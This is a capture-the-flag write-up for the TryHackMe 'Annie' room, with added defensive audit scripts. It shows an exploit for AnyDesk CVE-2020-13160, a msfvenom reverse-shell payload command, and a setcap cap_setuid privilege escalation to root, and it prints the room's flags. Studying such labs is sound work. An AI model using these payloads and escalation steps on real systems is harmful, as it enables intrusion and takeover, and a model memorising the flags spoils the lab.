Annie

Remote access comes in different flavors. Another Try Hack Me free room, this one classified as medium difficulty.
First thing I try is to see if there's some web response. No answer after trying to reach it through port 80. Okay, I'd run nmap anyway.
w1zard in try-hack-me/rooms/annie
nmap -Pn -p- -oA nmap-fullports-annie 10.10.92.77
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-11 17:35 -03
Nmap scan report for 10.10.92.77
Host is up (0.35s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
7070/tcp open realserver
43353/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1082.16 seconds
Right, we can run the default script scan (-sC) along with service/version detection (-sV) against the three open ports.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 72d72534e807b7d96fbad6981aa317db (RSA)
| 256 721026ce5c53084b6183f87ad19e9b86 (ECDSA)
|_ 256 d10e6da84e8e20ce1f0032c1448dfe4e (ED25519)
7070/tcp open ssl/realserver?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=AnyDesk Client
| Not valid before: 2022-03-23T20:04:30
|_Not valid after: 2072-03-10T20:04:30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I kinda wanted a version number, but let’s work with what we have in hand. Let me look for some exploits.
w1zard in try-hack-me/rooms/annie
searchsploit anydesk
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation | windows/local/40410.txt
AnyDesk 5.4.0 - Unquoted Service Path | windows/local/47883.txt
AnyDesk 5.5.2 - Remote Code Execution | linux/remote/49613.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Going straight for the RCE.
w1zard in try-hack-me/rooms/annie
searchsploit -m 49613
Exploit: AnyDesk 5.5.2 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/49613
Path: /usr/share/exploitdb/exploits/linux/remote/49613.py
Codes: CVE-2020-13160
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/w1zard/Documents/labs/try-hack-me/rooms/annie/49613.py
A bit of inspection and, oh, great, there's a link to a walkthrough. I just have to change the target IP and port and create a shellcode payload using msfvenom.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
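A check worth running before pasting the generated bytes into 49613.py, as an added example that is not part of the original writeup or of the exploit: it rebuilds the byte string from msfvenom's `-f python` text without calling exec(), then reports any of the three bytes the command above excludes that slipped through. NUL terminates the C string the target handles, and '%' would be read as a format directive since CVE-2020-13160 is a format-string bug; '&' is simply the third byte the command excludes. The sample output below is constructed to look like msfvenom's and is not real shellcode; the last chunk deliberately contains a 0x25 to show what a failed encoding run looks like.

```python
import re

# The bytes excluded by `msfvenom ... -b "\x00\x25\x26"` above.
BAD_BYTES = b"\x00\x25\x26"

# Constructed sample in the shape `msfvenom -f python -v shellcode` emits.
# Not real shellcode: the second chunk contains a deliberate 0x25 ('%').
SAMPLE_MSFVENOM_OUTPUT = '''\
shellcode =  b""
shellcode += b"\\x48\\x31\\xc0\\x48\\x31\\xff\\x48\\x31\\xf6"
shellcode += b"\\x6a\\x29\\x58\\x0f\\x05\\x25\\x90\\x90"
'''

_CHUNK = re.compile(r'b"((?:\\x[0-9a-fA-F]{2})*)"')   # the b"..." literal on a line
_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")           # one \xHH escape


def parse_msfvenom_python(text: str) -> bytes:
    """Rebuild the byte string from msfvenom's Python output without exec()."""
    out = bytearray()
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("shellcode"):
            continue
        m = _CHUNK.search(line)
        if m:
            out += bytes(int(h, 16) for h in _ESCAPE.findall(m.group(1)))
    return bytes(out)


def find_bad_bytes(shellcode: bytes, bad: bytes = BAD_BYTES) -> list:
    """Return (offset, byte) for every bad byte present; an empty list means clean."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


def check(text: str) -> dict:
    """Parse msfvenom output and summarise length and bad-byte hits."""
    sc = parse_msfvenom_python(text)
    hits = find_bad_bytes(sc)
    return {"length": len(sc), "bad": hits, "clean": not hits}


if __name__ == "__main__":
    # Run against the constructed sample; a real run would read the msfvenom output.
    print(check(SAMPLE_MSFVENOM_OUTPUT))
```

If the result is not clean, rerun msfvenom (a different encoder iteration usually finds an encoding) rather than editing the bytes by hand; a stray NUL or '%' is one reason a format-string exploit silently does nothing.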
Shellcode goes into the exploit, and the exploit does nothing. I tried running the exploit a couple of times, thought the machine was wonky and rebooted it. Executed the exploit a couple more times, nothing. Fvck. Changed absolutely nothing, ran the exploit a few more times…
connect to [10.13.3.36] from (UNKNOWN) [10.10.128.217] 45640
No logic, just repeat the same thing and maybe you’ll get a different result.
python3 -c 'import pty;pty.spawn("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
annie@desktop:/home/annie$ cat user.txt
THM{N0t_Ju5t_ANY_D3sk}
Now for the privilege escalation. The way I found was through SUID binaries owned by root.
annie@desktop:/home/annie$ find / -perm -4000 -type f -exec ls -al {} 2>/dev/null \;
-rwsr-xr-x 1 root root 10232 Nov 16 2017 /sbin/setcap
-rwsr-xr-x 1 root root 43088 Sep 16 2020 /bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 44664 Jan 25 2022 /bin/su
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 26696 Sep 16 2020 /bin/umount
-rwsr-xr-- 1 root dip 378600 Jul 23 2020 /usr/sbin/pppd
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Mar 2 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14328 Jan 12 2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 root root 10232 Dec 14 2021 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 22528 Jun 28 2019 /usr/bin/arping
-rwsr-xr-x 1 root root 40344 Jan 25 2022 /usr/bin/newgrp
-rwsr-xr-x 1 root root 149080 Jan 19 2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 76496 Jan 25 2022 /usr/bin/chfn
-rwsr-xr-x 1 root root 75824 Jan 25 2022 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44528 Jan 25 2022 /usr/bin/chsh
-rwsr-xr-x 1 root root 59640 Jan 25 2022 /usr/bin/passwd
-rwsr-xr-x 1 root root 22520 Jan 12 2022 /usr/bin/pkexec
setcap stands out from the list. Let me have a look at this.

Okay: setcap writes file capabilities into a binary's extended attributes, which normally requires root (CAP_SETFCAP). With setcap itself SUID root, any user can grant any capability to any binary they can write. So the trick is to copy python3, give the copy cap_setuid+ep (permitted and effective, so the interpreter holds it at exec without having to raise it), call os.setuid(0) from it and spawn a root shell. Programs with forced capabilities can be exploited this way by passing them malicious commands or arguments which are then run as root. Thanks HackTricks.
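A way to turn the listing above into a repeatable check, as an added example that is not part of the original writeup: it parses `ls -al` lines from the `find / -perm -4000` output and flags setuid-root binaries outside an assumed baseline (the other entries in the listing above, which ship setuid on a stock Ubuntu 18.04 install), and it parses `getcap -r / 2>/dev/null` output to flag binaries carrying capabilities such as cap_setuid, which is the artifact the technique in this section leaves behind. Both inputs below are constructed samples, not captured from the room.

```python
import re

# Constructed sample: a subset of the find listing above, in `ls -al` form.
SAMPLE_SUID_LISTING = """\
-rwsr-xr-x 1 root root 10232 Nov 16 2017 /sbin/setcap
-rwsr-xr-x 1 root root 43088 Sep 16 2020 /bin/mount
-rwsr-xr-x 1 root root 44664 Jan 25 2022 /bin/su
-rwsr-xr-- 1 root dip 378600 Jul 23 2020 /usr/sbin/pppd
-rwsr-xr-x 1 root root 149080 Jan 19 2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 22520 Jan 12 2022 /usr/bin/pkexec
"""

# Constructed sample of `getcap -r / 2>/dev/null` after a python3 copy has been
# given cap_setuid+ep. libcap 2.25 prints "path = caps"; newer libcap prints
# "path caps"; the parser accepts both.
SAMPLE_GETCAP_OUTPUT = """\
/usr/bin/mtr-packet = cap_net_raw+ep
/home/annie/python3 = cap_setuid+ep
"""

# Assumed baseline: the setuid-root paths from the listing above other than
# /sbin/setcap, which do ship setuid on stock Ubuntu 18.04.
BASELINE_SUID = {
    "/bin/mount", "/bin/umount", "/bin/ping", "/bin/su", "/bin/fusermount",
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chfn", "/usr/bin/chsh",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/pkexec",
    "/usr/bin/arping", "/usr/bin/traceroute6.iputils", "/usr/sbin/pppd",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/usr/lib/xorg/Xorg.wrap",
    "/usr/lib/eject/dmcrypt-get-device",
}

# Capabilities that give root-equivalent power to an arbitrary binary.
DANGEROUS_CAPS = {
    "cap_setuid", "cap_setgid", "cap_setfcap", "cap_dac_override",
    "cap_dac_read_search", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module",
    "cap_chown", "cap_fowner",
}

# mode, links, owner, group, size, month, day, year-or-time, path
LS_RE = re.compile(
    r"^(?P<mode>[-bcdlps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<path>/.*)$"
)
# "/path = cap_a,cap_b+ep" or "/path cap_a,cap_b=ep"
CAP_RE = re.compile(r"^(?P<path>/\S+)\s*=?\s*(?P<caps>[a-z_,]+)[+=](?P<flags>[eip]+)$")


def parse_ls_line(line):
    """Parse one `ls -al` line; setuid/setgid come from the owner/group exec slots."""
    m = LS_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["setuid"] = d["mode"][3] in "sS"
    d["setgid"] = d["mode"][6] in "sS"
    return d


def audit_suid(listing, baseline=BASELINE_SUID):
    """Return [(path, reason)] for setuid-root binaries not in the baseline."""
    findings = []
    for line in listing.splitlines():
        e = parse_ls_line(line)
        if e and e["setuid"] and e["owner"] == "root" and e["path"] not in baseline:
            findings.append((e["path"], "setuid root, not in baseline"))
    return findings


def parse_getcap_line(line):
    """Parse one getcap line into (path, {caps}, {flags}); None if it is not one."""
    m = CAP_RE.match(line.strip())
    if not m:
        return None
    return m.group("path"), set(m.group("caps").split(",")), set(m.group("flags"))


def audit_caps(getcap_output, dangerous=DANGEROUS_CAPS):
    """Return [(path, 'cap_x+flags')] for binaries holding a dangerous capability."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps, flags = parsed
        hit = caps & dangerous
        if hit:
            findings.append((path, ",".join(sorted(hit)) + "+" + "".join(sorted(flags))))
    return findings


if __name__ == "__main__":
    print("odd setuid:", audit_suid(SAMPLE_SUID_LISTING))
    print("capabilities:", audit_caps(SAMPLE_GETCAP_OUTPUT))
```

The two checks are the two sides of this section: the first catches the precondition (a setuid setcap that no stock install ships), the second catches the result (a user-writable python3 holding cap_setuid). Both are cheap enough to run from a cron job and diff against a known-good copy.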
annie@desktop:/home/annie$ which python3
/usr/bin/python3
annie@desktop:/home/annie$ cp /usr/bin/python3 .
annie@desktop:/home/annie$ /sbin/setcap cap_setuid+ep /home/annie/python3
annie@desktop:/home/annie$ ./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@desktop:/home/annie# cat /root/root.txt
THM{0nly_th3m_5.5.2_D3sk}